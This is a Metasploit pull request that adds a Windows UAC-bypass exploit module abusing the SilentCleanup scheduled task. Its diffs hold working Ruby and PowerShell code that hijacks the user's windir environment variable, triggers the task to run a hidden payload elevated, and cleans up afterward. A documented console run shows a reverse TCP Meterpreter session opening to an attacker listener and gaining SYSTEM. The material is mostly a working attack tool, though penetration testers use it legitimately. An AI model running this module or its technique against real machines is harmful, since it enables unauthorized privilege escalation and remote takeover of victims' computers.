### PR TITLE
Add SilentCleanup UAC Bypass module

### DIFF
--- a/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md
@@ -35,7 +35,7 @@ SESSION => 6
 msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
 msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
-LHOST => 192.168.1.55
+LHOST => 192.168.1.xx
 msf5 exploit(windows/local/bypassuac_silentcleanup) > options
 
 Module options (exploit/windows/local/bypassuac_silentcleanup):
@@ -64,10 +64,10 @@ Exploit target:
 
 msf5 exploit(windows/local/bypassuac_silentcleanup) > run
 
-[*] Started reverse TCP handler on 192.168.1.55:4444 
+[*] Started reverse TCP handler on 192.168.1.xx:4444 
 [+] Part of Administrators group! Continuing...
-[*] Sending stage (206403 bytes) to 192.168.1.2
-[*] Meterpreter session 10 opened (192.168.1.55:4444 -> 192.168.1.2:55538) at 2019-06-20 15:00:14 -0400
+[*] Sending stage (206403 bytes) to 192.168.1.x
+[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400
 
 meterpreter > getsystem
 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

--- a/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md
@@ -1,0 +1,77 @@
+## Intro
+
+This module will bypass UAC on any Windows installation with Powershell installed. 
+
+There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
+When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
+%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must 
+be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.
+
+## Usage
+
+1. Create a session on the target system under the context of a local administrative user.
+1. Begin interacting with the module: `use exploit/windows/local/bypassuac_silentcleanup`.
+1. Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
+1. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+1. Make sure that the `SESSION` value is set to the existing session identifier.
+1. Invoke the module: `run`.
+
+## Scenario
+
+```
+msf5 > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                               Connection
+  --  ----  ----                     -----------                               ----------
+  6         meterpreter x86/windows  DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP  192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)
+
+msf5 > use exploit/windows/local/bypassuac_silentcleanup 
+msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
+SESSION => 6
+msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
+LHOST => 192.168.1.55
+msf5 exploit(windows/local/bypassuac_silentcleanup) > options
+
+Module options (exploit/windows/local/bypassuac_silentcleanup):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   SESSION    6                yes       The session to run this module on.
+   SLEEPTIME  0                no        The time (ms) to sleep before running SilentCleanup
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.55     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Microsoft Windows
+
+
+msf5 exploit(windows/local/bypassuac_silentcleanup) > run
+
+[*] Started reverse TCP handler on 192.168.1.55:4444 
+[+] Part of Administrators group! Continuing...
+[*] Sending stage (206403 bytes) to 192.168.1.2
+[*] Meterpreter session 10 opened (192.168.1.55:4444 -> 192.168.1.2:55538) at 2019-06-20 15:00:14 -0400
+
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > bg
+[*] Backgrounding session 10...
+msf5 exploit(windows/local/bypassuac_silentcleanup) > 
+```

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -6,18 +6,14 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-  include Exploit::Powershell
-  include Post::Windows::Priv
+  include Msf::Exploit::Powershell
+  include Msf::Post::Windows::Priv
   include Msf::Post::File
-  include Msf::Post::Common
   include Msf::Exploit::FileDropper
-
-
-  PSH_PATH = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'                 => "Windows Escalate UAC Protection Bypass (Via SilentCleanup)",
+      'Name'                 => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',
       'Description'          => %q{
         There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
         When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
@@ -25,23 +21,28 @@ class MetasploitModule < Msf::Exploit::Local
       },
       'License'              => MSF_LICENSE,
       'Author'               => [
-        'Carter Brainerd (cbrnrd)',  # Metasploit Module
-        'lokiuox'     # Vuln discovery
+        'tyranid', # Discovery
+        'byshone69', # Discovery
+        'Carter Brainerd (cbrnrd)' # Metasploit Module
       ],
-      'Platform' => ['win'],
-      'SessionTypes' => ['meterpreter'],
-      'Arch' => [ARCH_X86, ARCH_X64],
-      'Targets' => [['Microsoft Windows', {}]],
-      'DisclosureDate' => 'Feb 24 2018'
+      'Platform'             => ['win'],
+      'SessionTypes'         => ['meterpreter', 'shell'],
+      'Arch'                 => [ARCH_X86, ARCH_X64],
+      'Targets'              => [['Microsoft Windows', {}]],
+      'DisclosureDate'       => 'Feb 24 2019',
+      'References'           => [
+        ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],
+        ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],
+        ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']
+      ]
     ))
 
     register_options(
       [
-        OptInt.new('SLEEPTIME', [false, "The time (ms) to sleep before running SilentCleanup", 0])
+        OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),
+        OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"])
       ])
   end
-
-
 
   def get_bypass_script(cmd)
     scr = %Q{
@@ -63,21 +64,19 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    check_permissions!
+    check_permissions
 
     e_vars = get_envs('TEMP')
     payload_fp = "#{e_vars['TEMP']}\\#{rand_text_alpha(8)}.ps1"
 
-
     # Write it to disk, run, delete
     upload_payload_ps1(payload_fp)
-    vprint_good "Payload uploaded to #{payload_fp}"
+    vprint_good("Payload uploaded to #{payload_fp}")
 
-    cmd_exec("#{expand_path(PSH_PATH)} -ep bypass #{payload_fp}")
+    cmd_exec("#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}")
   end
 
-
-  def check_permissions!
+  def check_permissions
     # Check if you are an admin
     vprint_status('Checking admin status...')
     admin_group = is_in_admin_group?
@@ -96,12 +95,10 @@ class MetasploitModule < Msf::Exploit::Local
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
       fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
     end
-
   end
 
-
   def upload_payload_ps1(filepath)
-
+    
     pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
     begin
       vprint_status("Uploading payload PS1...")
@@ -111,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::Unknown, "Error uploading file #{filepath}: #{e.class} #{e}")
     end
   end
-
 end

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check_permissions
     # Check if you are an admin
-    case admin_group
+    case is_in_admin_group?
     when nil
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -12,36 +12,36 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Common
   include Msf::Exploit::FileDropper
 
-  
+
   PSH_PATH = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
 
   def initialize(info = {})
     super(update_info(info,
       'Name'                 => "Windows Escalate UAC Protection Bypass (Via SilentCleanup)",
       'Description'          => %q{
-        There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. 
-        When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, 
+        There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
+        When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
         %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin.
       },
       'License'              => MSF_LICENSE,
       'Author'               => [
         'Carter Brainerd (cbrnrd)',  # Metasploit Module
-        'lokiuox',     # Vuln discovery
-        'enigma0x3'    # Vuln discovery
+        'lokiuox'     # Vuln discovery
       ],
       'Platform' => ['win'],
       'SessionTypes' => ['meterpreter'],
       'Arch' => [ARCH_X86, ARCH_X64],
       'Targets' => [['Microsoft Windows', {}]],
+      'DisclosureDate', 'Feb 24 2018'
     ))
 
     register_options(
       [
         OptInt.new('SLEEPTIME', [false, "The time (ms) to sleep before running SilentCleanup", 0])
-      ], self.class)
+      ])
   end
 
-  
+
 
   def get_bypass_script(cmd)
     scr = %Q{

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -78,18 +78,14 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check_permissions
     # Check if you are an admin
-    vprint_status('Checking admin status...')
-    admin_group = is_in_admin_group?
-
-    if admin_group.nil?
+    case admin_group
+    when nil
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
-    else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+    when true
+      print_good('Part of Administrators group! Continuing...')
+    when false
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
@@ -98,10 +94,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def upload_payload_ps1(filepath)
-    
     pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
     begin
-      vprint_status("Uploading payload PS1...")
+      vprint_status('Uploading payload PS1...')
       write_file(filepath, get_bypass_script(pld))
       register_file_for_cleanup(filepath)
     rescue Rex::Post::Meterpreter::RequestError => e

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Local
       'License'              => MSF_LICENSE,
       'Author'               => [
         'tyranid', # Discovery
-        'byshone69', # Discovery
+        'enigma0x3', # Discovery
+        'nyshone69', # Discovery
         'Carter Brainerd (cbrnrd)' # Metasploit Module
       ],
       'Platform'             => ['win'],
@@ -32,6 +33,7 @@ class MetasploitModule < Msf::Exploit::Local
       'DisclosureDate'       => 'Feb 24 2019',
       'References'           => [
         ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],
+        ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],
         ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],
         ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']
       ]

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -31,9 +31,8 @@ class MetasploitModule < Msf::Exploit::Local
       ],
       'Platform' => ['win'],
       'SessionTypes' => ['meterpreter'],
-      'Targets'       => [
-        [ 'Windows Powershell', {  } ]
-    ],
+      'Arch' => [ARCH_X86, ARCH_X64],
+      'Targets' => [['Microsoft Windows', {}]],
     ))
 
     register_options(
@@ -102,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Local
 
 
   def upload_payload_ps1(filepath)
-    # FOR THE LIFE OF ME I CANNOT FIGURE THIS OUT
+    
     pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
     begin
       vprint_status("Uploading payload PS1...")

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::Windows::Priv
+  include Msf::Post::File
+  include Msf::Post::Common
+  include Msf::Exploit::FileDropper
+
+  
+  PSH_PATH = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                 => "Windows Escalate UAC Protection Bypass (Via SilentCleanup)",
+      'Description'          => %q{
+        There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. 
+        When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, 
+        %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin.
+      },
+      'License'              => MSF_LICENSE,
+      'Author'               => [
+        'Carter Brainerd (cbrnrd)',  # Metasploit Module
+        'lokiuox',     # Vuln discovery
+        'enigma0x3'    # Vuln discovery
+      ],
+      'Platform' => ['win'],
+      'SessionTypes' => ['meterpreter'],
+      'Targets'       => [
+        [ 'Windows Powershell', {  } ]
+    ],
+    ))
+
+    register_options(
+      [
+        OptInt.new('SLEEPTIME', [false, "The time (ms) to sleep before running SilentCleanup", 0])
+      ], self.class)
+  end
+
+  
+
+  def get_bypass_script(cmd)
+    scr = %Q{
+      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
+        #{cmd}
+      } else {
+          $registryPath = "HKCU:\\Environment"
+          $Name = "windir"
+          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
+          Set-ItemProperty -Path $registryPath -Name $name -Value $Value
+          #Depending on the performance of the machine, some sleep time may be required before or after schtasks
+          Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}
+          schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null
+          Remove-ItemProperty -Path $registryPath -Name $name
+      }
+    }
+    vprint_status(scr)
+    scr
+  end
+
+  def exploit
+    check_permissions!
+
+    e_vars = get_envs('TEMP')
+    payload_fp = "#{e_vars['TEMP']}\\#{rand_text_alpha(8)}.ps1"
+
+
+    # Write it to disk, run, delete
+    upload_payload_ps1(payload_fp)
+    vprint_good "Payload uploaded to #{payload_fp}"
+
+    cmd_exec("#{expand_path(PSH_PATH)} -ep bypass #{payload_fp}")
+  end
+
+
+  def check_permissions!
+    # Check if you are an admin
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+    
+  end
+
+
+  def upload_payload_ps1(filepath)
+    # FOR THE LIFE OF ME I CANNOT FIGURE THIS OUT
+    pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+    begin
+      vprint_status("Uploading payload PS1...")
+      write_file(filepath, get_bypass_script(pld))
+      register_file_for_cleanup(filepath)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::Unknown, "Error uploading file #{filepath}: #{e.class} #{e}")
+    end
+  end
+
+end

--- a/modules/exploits/windows/local/bypassuac_silentcleanup.rb
+++ b/modules/exploits/windows/local/bypassuac_silentcleanup.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Local
       'SessionTypes' => ['meterpreter'],
       'Arch' => [ARCH_X86, ARCH_X64],
       'Targets' => [['Microsoft Windows', {}]],
-      'DisclosureDate', 'Feb 24 2018'
+      'DisclosureDate' => 'Feb 24 2018'
     ))
 
     register_options(
@@ -96,12 +96,12 @@ class MetasploitModule < Msf::Exploit::Local
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
       fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
     end
-    
+
   end
 
 
   def upload_payload_ps1(filepath)
-    
+
     pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
     begin
       vprint_status("Uploading payload PS1...")


### PR DESCRIPTION
This PR adds a module that bypasses UAC via the "SilentCleanup" task in Windows Task Scheduler

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use exploit/windows/smb/local/bypassuac_silentcleanup`
- [x] `set session 1`
- [x] `run`
- [x] Get an elevated session

## TODO
 * ~~**Getting it to work**
I have tried for days but I cannot figure out the proper configuration for `cmd_psh_payload` to work when in a PS1 context. *Any help would be greatly appreciated.*~~ Thanks @NickTyrer! 
 * ~~Docs~~ (ping @h00die) 

## References
https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/
https://www.youtube.com/watch?v=C9GfMfFjhYI&t=432s